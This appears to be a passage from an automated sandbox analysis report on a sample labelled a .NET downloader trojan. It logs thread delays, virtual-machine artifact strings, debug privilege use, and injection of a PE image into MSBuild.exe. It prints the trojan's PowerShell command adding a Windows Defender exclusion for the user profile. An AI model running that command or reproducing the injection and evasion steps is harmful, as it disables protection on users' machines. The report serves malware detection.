Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598278	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598022	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597902	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597776	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597662	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597423	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597291	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597175	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597060	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596944	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596721	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596589	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596474	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596241	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595941	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595689	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595448	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595332	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594962	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594846	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594715	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594613	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594476	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594376	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594245	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594128	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593991	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593759	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593511	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7415	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2224	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 6179	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7656	Thread sleep count: 3610 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599884s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7656	Thread sleep count: 6179 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599775s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599660s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599298s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599163s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -599035s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -598702s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -598561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -598420s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -598278s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -598157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -598022s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597902s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597776s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597662s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597423s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597291s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597175s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -597060s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -596944s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -596843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -596721s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -596589s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -596474s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -596358s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -596241s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595941s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595689s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595448s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595332s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595216s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4176	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594962s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594846s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594715s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594613s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594476s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594376s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594245s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -594128s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -593991s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -593875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -593759s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -593643s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648	Thread sleep time: -593511s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1548	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7908	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Code function: 0_2_00007FF67DCC2730 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF67DCC2730

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599884	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599660	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599540	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599298	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599163	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599035	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598278	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598022	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597902	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597776	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597662	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597423	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597291	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597175	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597060	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596944	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596721	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596589	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596474	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596241	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595941	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595689	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595448	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595332	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594962	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594846	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594715	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594613	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594476	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594376	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594245	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594128	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593991	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593759	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593511	Jump to behavior

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2165086329.0000019C17834000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}QUv
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2165086329.0000019C17834000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: svchost.exe, 00000009.00000002.3816548089.000002CA7A854000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: svchost.exe, 00000009.00000002.3815982798.000002CA7522B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltr
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Code function: 0_2_00007FF67DD19B08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00007FF67DD19B08

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 404000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 406000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CB9008	Jump to behavior

